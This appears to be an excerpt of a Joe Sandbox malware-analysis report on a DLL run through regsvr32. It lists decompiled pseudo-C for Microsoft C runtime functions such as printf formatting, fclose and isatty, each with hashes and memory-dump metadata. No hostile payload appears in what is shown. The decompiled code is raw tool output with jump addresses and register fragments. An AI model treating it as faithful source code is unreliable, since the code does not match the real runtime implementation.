                                    • String ID: ("Buffer too small", 0)$_vsnprintf_s_l$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\vsprintf.c
                                    • API String ID: 2123368286-3717698799
                                    • Opcode ID: 9007319e5b81e0e19641b6dff6978a626c4b249898d68e368399ad5d9614f895
                                    • Instruction ID: f46ca83dba6c4e2be9a9571e906a820c6a216ec021220a7175966cdc7e38441f
                                    • Opcode Fuzzy Hash: 9007319e5b81e0e19641b6dff6978a626c4b249898d68e368399ad5d9614f895
                                    • Instruction Fuzzy Hash: EB810D31A1DB8686DAB08B29E84476E73E0F385765F204225E6ED437E9DF3DD445CB01
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 20%
                                    			E000007FE7FEF9D3C719(signed int __rax, void* __rdx, long long _a32, void* _a64, void* _a72, intOrPtr _a76, signed int _a80, char _a84, char _a85, intOrPtr _a88, long long _a92, long long _a96, signed char _a104, intOrPtr _a108, signed int _a116, char _a120, char _a687, char _a688, intOrPtr _a704, intOrPtr _a708, signed char _a816, signed int _a824, signed int _a832, intOrPtr _a840, signed short* _a848, signed char _a856, char _a860, char _a864, long long _a872, intOrPtr _a876, intOrPtr _a912, intOrPtr _a916, signed int _a1040, long long _a1048, signed short _a1056, long long _a1060, signed int _a1064, intOrPtr _a1088, char _a1112) {
                                    				signed int _t212;
                                    				signed char _t217;
                                    				intOrPtr _t252;
                                    				signed int _t327;
                                    				signed int _t328;
                                    				signed long long _t331;
                                    				intOrPtr* _t354;
                                    				signed long long _t379;
                                    
                                    				_t327 = __rax;
                                    				_a708 = 0x27;
                                    				_a72 = 0x10;
                                    				if ((_a80 & 0x00000080) == 0) goto 0xf9d3c754;
                                    				_a84 = 0x30;
                                    				_a85 = _a708 + 0x51;
                                    				_a92 = 2;
                                    				_a72 = 8;
                                    				if ((_a80 & 0x00000080) == 0) goto 0xf9d3c777;
                                    				asm("bts eax, 0x9");
                                    				if ((_a80 & 0x00008000) == 0) goto 0xf9d3c79e;
                                    				E000007FE7FEF9D31EA0( &_a1112);
                                    				_a824 = _t327;
                                    				goto 0xf9d3c84b;
                                    				if ((_a80 & 0x00001000) == 0) goto 0xf9d3c7c5;
                                    				E000007FE7FEF9D31EA0( &_a1112);
                                    				_a824 = _t327;
                                    				goto 0xf9d3c84b;
                                    				if ((_a80 & 0x00000020) == 0) goto 0xf9d3c810;
                                    				if ((_a80 & 0x00000040) == 0) goto 0xf9d3c7f6;
                                    				_t328 = E000007FE7FEF9D31E40( &_a1112);
                                    				_a824 = _t328;
                                    				goto 0xf9d3c80e;
                                    				E000007FE7FEF9D31E40( &_a1112);
                                    				_a824 = _t328;
                                    				goto 0xf9d3c84b;
                                    				if ((_a80 & 0x00000040) == 0) goto 0xf9d3c834;
                                    				E000007FE7FEF9D31E40( &_a1112);
                                    				_a824 = _t328;
                                    				goto 0xf9d3c84b;
                                    				E000007FE7FEF9D31E40( &_a1112);
                                    				_a824 = _t328;
                                    				if ((_a80 & 0x00000040) == 0) goto 0xf9d3c882;
                                    				if (_a824 >= 0) goto 0xf9d3c882;
                                    				_a832 =  ~_a824;
                                    				asm("bts eax, 0x8");
                                    				goto 0xf9d3c892;
                                    				_t331 = _a824;
                                    				_a832 = _t331;
                                    				if ((_a80 & 0x00008000) != 0) goto 0xf9d3c8c7;
                                    				if ((_a80 & 0x00001000) != 0) goto 0xf9d3c8c7;
                                    				_a832 = _a832 & _t331;
                                    				if (_a116 >= 0) goto 0xf9d3c8d8;
                                    				_a116 = 1;
                                    				goto 0xf9d3c8f5;
                                    				_a80 = _a80 & 0xfffffff7;
                                    				if (_a116 - 0x200 <= 0) goto 0xf9d3c8f5;
                                    				_a116 = 0x200;
                                    				if (_a832 != 0) goto 0xf9d3c908;
                                    				_a92 = 0;
                                    				_a64 =  &_a687;
                                    				_t212 = _a116;
                                    				_a116 = _a116 - 1;
                                    				if (_t212 > 0) goto 0xf9d3c936;
                                    				if (_a832 == 0) goto 0xf9d3c9d3;
                                    				_a1040 = _a72;
                                    				_a816 = _t212 / _a1040 + 0x30;
                                    				_a1048 = _a72;
                                    				if (_a816 - 0x39 <= 0) goto 0xf9d3c9b2;
                                    				_t217 = _a816 + _a708;
                                    				_a816 = _t217;
                                    				 *_a64 = _a816 & 0x000000ff;
                                    				_a64 = _a64 - 1;
                                    				goto 0xf9d3c915;
                                    				_a104 = _t217;
                                    				_a64 = _a64 + 1;
                                    				if ((_a80 & 0x00000200) == 0) goto 0xf9d3ca31;
                                    				if (_a104 == 0) goto 0xf9d3ca12;
                                    				if ( *_a64 == 0x30) goto 0xf9d3ca31;
                                    				_a64 = _a64 - 1;
                                    				 *_a64 = 0x30;
                                    				_a104 = _a104 + 1;
                                    				if (_a108 != 0) goto 0xf9d3cc6e;
                                    				if ((_a80 & 0x00000040) == 0) goto 0xf9d3ca95;
                                    				if ((_a80 & 0x00000100) == 0) goto 0xf9d3ca63;
                                    				_a84 = 0x2d;
                                    				_a92 = 1;
                                    				goto 0xf9d3ca95;
                                    				if ((_a80 & 0x00000001) == 0) goto 0xf9d3ca7d;
                                    				_a84 = 0x2b;
                                    				_a92 = 1;
                                    				goto 0xf9d3ca95;
                                    				if ((_a80 & 0x00000002) == 0) goto 0xf9d3ca95;
                                    				_a84 = 0x20;
                                    				_a92 = 1;
                                    				_a840 = _a88 - _a104 - _a92;
                                    				if ((_a80 & 0x0000000c) != 0) goto 0xf9d3cad5;
                                    				E000007FE7FEF9D3CF10(0x20, _a840, _a1088,  &_a688);
                                    				E000007FE7FEF9D3CF60(_a92, _a64,  &_a84, _a1088,  &_a688);
                                    				if ((_a80 & 0x00000008) == 0) goto 0xf9d3cb27;
                                    				if ((_a80 & 0x00000004) != 0) goto 0xf9d3cb27;
                                    				E000007FE7FEF9D3CF10(0x30, _a840, _a1088,  &_a688);
                                    				if (_a76 == 0) goto 0xf9d3cc1d;
                                    				if (_a104 <= 0) goto 0xf9d3cc1d;
                                    				_a872 = 0;
                                    				_a848 = _a64;
                                    				_a856 = _a104;
                                    				_a856 = _a856 - 1;
                                    				if (_a856 == 0) goto 0xf9d3cc1b;
                                    				_a1056 =  *_a848 & 0x0000ffff;
                                    				r9d = _a1056 & 0x0000ffff;
                                    				r8d = 6;
                                    				_a872 = E000007FE7FEF9D3B530( &_a860,  &_a864, _a1088);
                                    				_a848 =  &(_a848[1]);
                                    				if (_a872 != 0) goto 0xf9d3cbe5;
                                    				if (_a860 != 0) goto 0xf9d3cbf2;
                                    				_a688 = 0xffffffff;
                                    				goto 0xf9d3cc1b;
                                    				E000007FE7FEF9D3CF60(_a860,  &(_a848[1]),  &_a864, _a1088,  &_a688);
                                    				goto 0xf9d3cb60;
                                    				goto 0xf9d3cc3b;
                                    				E000007FE7FEF9D3CF60(_a104,  &(_a848[1]), _a64, _a1088,  &_a688);
                                    				if (_a688 < 0) goto 0xf9d3cc6e;
                                    				if ((_a80 & 0x00000004) == 0) goto 0xf9d3cc6e;
                                    				E000007FE7FEF9D3CF10(0x20, _a840, _a1088,  &_a688);
                                    				if (_a96 == 0) goto 0xf9d3cc8e;
                                    				0xf9d25330();
                                    				_a96 = 0;
                                    				goto 0xf9d3b99c;
                                    				if (_a704 == 0) goto 0xf9d3ccb4;
                                    				if (_a704 == 7) goto 0xf9d3ccb4;
                                    				_a1060 = 0;
                                    				goto 0xf9d3ccbf;
                                    				_a1060 = 1;
                                    				_t252 = _a1060;
                                    				_a876 = _t252;
                                    				if (_a876 != 0) goto 0xf9d3cd05;
                                    				_t354 = L"((state == ST_NORMAL) || (state == ST_TYPE))";
                                    				_a32 = _t354;
                                    				r9d = 0;
                                    				r8d = 0x8f5;
                                    				0xf9d2b3b0();
                                    				if (_t252 != 1) goto 0xf9d3cd05;
                                    				asm("int3");
                                    				if (_a876 != 0) goto 0xf9d3cd61;
                                    				0xf9d2ab30();
                                    				 *_t354 = 0x16;
                                    				_a32 = 0;
                                    				r9d = 0x8f5;
                                    				E000007FE7FEF9D2BD70(L"((state == ST_NORMAL) || (state == ST_TYPE))", L"_output_s_l", L"f:\\dd\\vctools\\crt_bld\\self_64_amd64\\crt\\src\\output.c");
                                    				_a912 = 0xffffffff;
                                    				E000007FE7FEF9D26800( &_a120);
                                    				goto 0xf9d3cd80;
                                    				_a916 = _a688;
                                    				E000007FE7FEF9D26800( &_a120);
                                    				return E000007FE7FEF9D23280(_a916, 2, 2, _a1064 ^ _t379, L"_output_s_l", L"f:\\dd\\vctools\\crt_bld\\self_64_amd64\\crt\\src\\output.c");
                                    			}











                                    0x7fef9d3cafc
                                    0x7fef9d3cb07
                                    0x7fef9d3cb22
                                    0x7fef9d3cb2c
                                    0x7fef9d3cb37
                                    0x7fef9d3cb3d
                                    0x7fef9d3cb4d
                                    0x7fef9d3cb59
                                    0x7fef9d3cb70
                                    0x7fef9d3cb79
                                    0x7fef9d3cb8a
                                    0x7fef9d3cb92
                                    0x7fef9d3cb9b
                                    0x7fef9d3cbb6
                                    0x7fef9d3cbc9
                                    0x7fef9d3cbd9
                                    0x7fef9d3cbe3
                                    0x7fef9d3cbe5
                                    0x7fef9d3cbf0
                                    0x7fef9d3cc11
                                    0x7fef9d3cc16
                                    0x7fef9d3cc1b
                                    0x7fef9d3cc36
                                    0x7fef9d3cc43
                                    0x7fef9d3cc4e
                                    0x7fef9d3cc69
                                    0x7fef9d3cc74
                                    0x7fef9d3cc80
                                    0x7fef9d3cc85
                                    0x7fef9d3cc8e
                                    0x7fef9d3cc9b
                                    0x7fef9d3cca5
                                    0x7fef9d3cca7
                                    0x7fef9d3ccb2
                                    0x7fef9d3ccb4
                                    0x7fef9d3ccbf
                                    0x7fef9d3ccc6
                                    0x7fef9d3ccd5
                                    0x7fef9d3ccd7
                                    0x7fef9d3ccde
                                    0x7fef9d3cce3
                                    0x7fef9d3cce6
                                    0x7fef9d3ccf8
                                    0x7fef9d3cd00
                                    0x7fef9d3cd02
                                    0x7fef9d3cd0d
                                    0x7fef9d3cd0f
                                    0x7fef9d3cd14
                                    0x7fef9d3cd1a
                                    0x7fef9d3cd23
                                    0x7fef9d3cd3e
                                    0x7fef9d3cd43
                                    0x7fef9d3cd53
                                    0x7fef9d3cd5f
                                    0x7fef9d3cd68
                                    0x7fef9d3cd74
                                    0x7fef9d3cd97

                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.917585248.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                    • Associated: 00000003.00000002.917582785.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmp
                                    • Associated: 00000003.00000002.917601106.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmp
                                    • Associated: 00000003.00000002.917607068.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmp
                                    • Associated: 00000003.00000002.917614005.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                    Similarity
                                    • API ID: get_int64_arg
                                    • String ID: '$0$9
                                    • API String ID: 1967237116-269856862
                                    • Opcode ID: 83c439eea7fc9ce93bcb821b911d608e7d80de2d13083439c5735137d4fc31ad
                                    • Instruction ID: b3eda79bc04a60fb7ee4a4011f7c31915f3bf9e4e3688118cbdbb277fe6e384d
                                    • Opcode Fuzzy Hash: 83c439eea7fc9ce93bcb821b911d608e7d80de2d13083439c5735137d4fc31ad
                                    • Instruction Fuzzy Hash: 0D41B47260DAC187E7B58B19E8957AEB7E4F385791F100125EAC886B98DB7DE640CF00
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.917585248.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                    • Associated: 00000003.00000002.917582785.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmp
                                    • Associated: 00000003.00000002.917601106.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmp
                                    • Associated: 00000003.00000002.917607068.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmp
                                    • Associated: 00000003.00000002.917614005.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                    Similarity
                                    • API ID: Frame$CreateDestroyedExceptionFindInfoObjectUnlink
                                    • String ID: csm
                                    • API String ID: 2005287440-1018135373
                                    • Opcode ID: 4c556ceed80f2aba1954f9041ed191ad0fbab56fa1f8ad9f2457e70616e7d401
                                    • Instruction ID: 0432dbe60f42fc154ce83aeddd16286c3d94edaaa77ff7db33c77853d76fe5a2
                                    • Opcode Fuzzy Hash: 4c556ceed80f2aba1954f9041ed191ad0fbab56fa1f8ad9f2457e70616e7d401
                                    • Instruction Fuzzy Hash: FB51A836608B8682DAA09B1AF49076E77E0F3C4B91F615125EBCD47BB5DF3AD444CB40
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.917585248.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                    • Associated: 00000003.00000002.917582785.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmp
                                    • Associated: 00000003.00000002.917601106.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmp
                                    • Associated: 00000003.00000002.917607068.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmp
                                    • Associated: 00000003.00000002.917614005.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                    Similarity
                                    • API ID: FileModuleName__initmbctable
                                    • String ID: C:\Windows\System32\regsvr32.exe$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\stdargv.c
                                    • API String ID: 3548084100-1254873407
                                    • Opcode ID: b22e410beffd46978b7d2afc3cd069083579849eea9e12d44582c014dad21e95
                                    • Instruction ID: c1f8112261206beaa0fda4b6683aef0dc38e0cb6ee3d4e311a15053ab41967b3
                                    • Opcode Fuzzy Hash: b22e410beffd46978b7d2afc3cd069083579849eea9e12d44582c014dad21e95
                                    • Instruction Fuzzy Hash: 47411C21A19A8281EA90CB19EC8136E77A0F7857A5F614626E6EE43BF4DF3ED144C701
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.917585248.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                    • Associated: 00000003.00000002.917582785.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmp
                                    • Associated: 00000003.00000002.917601106.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmp
                                    • Associated: 00000003.00000002.917607068.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmp
                                    • Associated: 00000003.00000002.917614005.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                    Similarity
                                    • API ID: _invalid_parameter
                                    • String ID: ("Buffer too small", 0)$_vsnprintf_s_l$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\vsprintf.c
                                    • API String ID: 2123368286-3717698799
                                    • Opcode ID: 902fc8e7192f88527d8aa4075598999d81e9371814558b5bb1293b80f5ddf804
                                    • Instruction ID: 7c05dd3e5b110925f13ad37327732dcd8002d47ee9d5ea83dce110c9ec813185
                                    • Opcode Fuzzy Hash: 902fc8e7192f88527d8aa4075598999d81e9371814558b5bb1293b80f5ddf804
                                    • Instruction Fuzzy Hash: B6412931E1C7868AEAB08B24E8447AE62E0F385365F604335D6ED427F5DB3EE444CB11
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.917585248.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                    • Associated: 00000003.00000002.917582785.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmp
                                    • Associated: 00000003.00000002.917601106.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmp
                                    • Associated: 00000003.00000002.917607068.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmp
                                    • Associated: 00000003.00000002.917614005.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                    Similarity
                                    • API ID: CountCriticalFileInitializeSectionSpinType_calloc_dbg_calloc_dbg_impl
                                    • String ID: f:\dd\vctools\crt_bld\self_64_amd64\crt\src\ioinit.c
                                    • API String ID: 2306298712-3864165772
                                    • Opcode ID: f14d95e79dbe0c44160fd2e577ceb585774a34057722467733e8b2231de90ff9
                                    • Instruction ID: 3bda70979e2781d9fddcfcf2e5c0164bb67a8e60ab66e06e656835f18ed7d390
                                    • Opcode Fuzzy Hash: f14d95e79dbe0c44160fd2e577ceb585774a34057722467733e8b2231de90ff9
                                    • Instruction Fuzzy Hash: 3A313D72A09BC585E7B08B19E84076E73E1F385764F618225CAED877E4DB3DE405CB11
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.917585248.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                    • Associated: 00000003.00000002.917582785.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmp
                                    • Associated: 00000003.00000002.917601106.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmp
                                    • Associated: 00000003.00000002.917607068.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmp
                                    • Associated: 00000003.00000002.917614005.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                    Similarity
                                    • API ID: _invalid_parameter
                                    • String ID: _wcstombs_s_l$bufferSize <= INT_MAX$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\wcstombs.c
                                    • API String ID: 2123368286-2562677240
                                    • Opcode ID: f1a9f826516545701b922f50b6ebdc9d8be9d112825cbb7a30042366d5f9c4a9
                                    • Instruction ID: 93e11cc603146a2a446790da906b27a7af07cbd58e629032b7549c60c7683809
                                    • Opcode Fuzzy Hash: f1a9f826516545701b922f50b6ebdc9d8be9d112825cbb7a30042366d5f9c4a9
                                    • Instruction Fuzzy Hash: 4A311632A0DB8685EAB09B15E8407AEB7E1F385390F204225D6DD03BE8DB7ED444CB02
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.917585248.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                    • Associated: 00000003.00000002.917582785.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmp
                                    • Associated: 00000003.00000002.917601106.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmp
                                    • Associated: 00000003.00000002.917607068.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmp
                                    • Associated: 00000003.00000002.917614005.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                    Similarity
                                    • API ID: _invalid_parameter$__doserrno
                                    • String ID: (str != NULL)$_fclose_nolock$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\fclose.c
                                    • API String ID: 1181141450-2845860089
                                    • Opcode ID: 60dcfdadd0e03516a84dc335c67980ba4999d51805a5974115e67aa140ed36a2
                                    • Instruction ID: 33c12517d78d4ed4392c0426817be49b117e9f4526535de823d8000f08003729
                                    • Opcode Fuzzy Hash: 60dcfdadd0e03516a84dc335c67980ba4999d51805a5974115e67aa140ed36a2
                                    • Instruction Fuzzy Hash: 81315A36A28A4686E7909B18E88476E77E0F380794F205125F6CE47BF5CB7ED841CF42
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.917585248.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                    • Associated: 00000003.00000002.917582785.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmp
                                    • Associated: 00000003.00000002.917601106.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmp
                                    • Associated: 00000003.00000002.917607068.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmp
                                    • Associated: 00000003.00000002.917614005.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                    Similarity
                                    • API ID: _invalid_parameter
                                    • String ID: (fh >= 0 && (unsigned)fh < (unsigned)_nhandle)$_isatty$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\isatty.c
                                    • API String ID: 2123368286-160817255
                                    • Opcode ID: eccc8fed36cae0d9a6e14cbb0507e08d02c226084f69b474f0b5454228c7b857
                                    • Instruction ID: 5484b95fc3e7d8404cd289b1f0f4537a60eed7c4b35d0a2d8431c0a05804e9c3
                                    • Opcode Fuzzy Hash: eccc8fed36cae0d9a6e14cbb0507e08d02c226084f69b474f0b5454228c7b857
                                    • Instruction Fuzzy Hash: F121AE71B2C6428AE7D89B24EC8476DB3E1F380356F609635E1DD476E4D77ED4408B00
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.917585248.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                    • Associated: 00000003.00000002.917582785.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmp
                                    • Associated: 00000003.00000002.917601106.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmp
                                    • Associated: 00000003.00000002.917607068.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmp
                                    • Associated: 00000003.00000002.917614005.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                    Similarity
                                    • API ID: _invalid_parameter
                                    • String ID: (stream != NULL)$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\fclose.c$fclose
                                    • API String ID: 2123368286-3409824857
                                    • Opcode ID: d31558689191b30e1debc2aa339dabcf4ed505ad636b5f29a69950b4dd90694d
                                    • Instruction ID: f9aafbf46e1760e7e33942ab5f057e126490a1467b3f18266bcf817366ff1fd0
                                    • Opcode Fuzzy Hash: d31558689191b30e1debc2aa339dabcf4ed505ad636b5f29a69950b4dd90694d
                                    • Instruction Fuzzy Hash: 5B214C72A1D64286EB909F58E88476E77E0F380394F605525E6CE476E4CBBED444CF42
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.917585248.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                    • Associated: 00000003.00000002.917582785.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmp
                                    • Associated: 00000003.00000002.917601106.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmp
                                    • Associated: 00000003.00000002.917607068.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmp
                                    • Associated: 00000003.00000002.917614005.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                    Similarity
                                    • API ID: Locale$UpdateUpdate::~_
                                    • String ID: (unsigned)(c + 1) <= 256$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\isctype.c
                                    • API String ID: 1901436342-3621827421
                                    • Opcode ID: 291659c115524f578e2ce7e37289a3f2ddc7b5bd59cb83b4eaeda8d1fa0b4c89
                                    • Instruction ID: 30d3218aedea65180b246fff2bb8bf0e075bfccfde79c9cac609a79bfc2ef9ad
                                    • Opcode Fuzzy Hash: 291659c115524f578e2ce7e37289a3f2ddc7b5bd59cb83b4eaeda8d1fa0b4c89
                                    • Instruction Fuzzy Hash: 4D210132918A8186E790DB24E8817AEB7E0F7C4780F614022E7DD83AB9DB7DD954CB40
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.917585248.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                    • Associated: 00000003.00000002.917582785.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmp
                                    • Associated: 00000003.00000002.917601106.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmp
                                    • Associated: 00000003.00000002.917607068.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmp
                                    • Associated: 00000003.00000002.917614005.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                    Similarity
                                    • API ID: _invalid_parameter
                                    • String ID: ("Invalid error_mode", 0)$_set_error_mode$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\errmode.c
                                    • API String ID: 2123368286-2972513288
                                    • Opcode ID: 8fb5a3cdd681d6a82b02ff81c277c719a79eaaec91177dc4ca99e8a0364f32ec
                                    • Instruction ID: a668ed4e1bbba8445569e891f5cf80d88739aba3494b1a7bdc37a92eebe2cfe6
                                    • Opcode Fuzzy Hash: 8fb5a3cdd681d6a82b02ff81c277c719a79eaaec91177dc4ca99e8a0364f32ec
                                    • Instruction Fuzzy Hash: 9A211A31E1D242CAE7E08F28EC44B6E72E0F344395F605536E6CA866B4D77EE944CB41
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.917585248.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                    • Associated: 00000003.00000002.917582785.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmp
                                    • Associated: 00000003.00000002.917601106.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmp
                                    • Associated: 00000003.00000002.917607068.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmp
                                    • Associated: 00000003.00000002.917614005.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                    Similarity
                                    • API ID: _invalid_parameter
                                    • String ID: _vsnprintf_s_l$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\vsprintf.c$string != NULL && sizeInBytes > 0
                                    • API String ID: 2123368286-367560414
                                    • Opcode ID: 9835c0e10505228e0bf6b58a8474be5f834255bb2e0cd334fa5f5b7dd6645e21
                                    • Instruction ID: 95dcae893ef448fe982beb095dca5536e461671d142ad8532ffb40fd25d94385
                                    • Opcode Fuzzy Hash: 9835c0e10505228e0bf6b58a8474be5f834255bb2e0cd334fa5f5b7dd6645e21
                                    • Instruction Fuzzy Hash: 1D114931E0C64A8AF7E08B14EC457BE62E0F750385F608425D2DD46AF5DBBEE4888B01
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.917585248.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                    • Associated: 00000003.00000002.917582785.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmp
                                    • Associated: 00000003.00000002.917601106.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmp
                                    • Associated: 00000003.00000002.917607068.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmp
                                    • Associated: 00000003.00000002.917614005.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                    Similarity
                                    • API ID: _invalid_parameter
                                    • String ID: _wcstombs_l_helper$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\wcstombs.c$pwcs != NULL
                                    • API String ID: 2123368286-2992382544
                                    • Opcode ID: 9cdd31bc13f045a84d1723aba15172f6d66e597d1102c0836733c4c00faf9839
                                    • Instruction ID: 1601facfcd706bab2d32f933ec1205f4baa2dc81ccca363939aa7dccefded7e9
                                    • Opcode Fuzzy Hash: 9cdd31bc13f045a84d1723aba15172f6d66e597d1102c0836733c4c00faf9839
                                    • Instruction Fuzzy Hash: FD112831A08A86D6E7F08B24EC547BE62D1F384395FA0862581DD826E5DF7ED184CB01
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.917585248.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                    • Associated: 00000003.00000002.917582785.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmp
